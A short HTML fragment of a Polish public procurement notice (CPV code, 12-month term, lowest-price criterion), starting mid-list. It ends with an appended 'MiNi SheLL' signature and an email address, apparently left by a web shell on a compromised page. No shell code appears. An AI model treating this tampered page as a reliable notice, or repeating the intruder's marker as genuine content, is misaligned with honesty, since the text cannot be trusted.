100	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com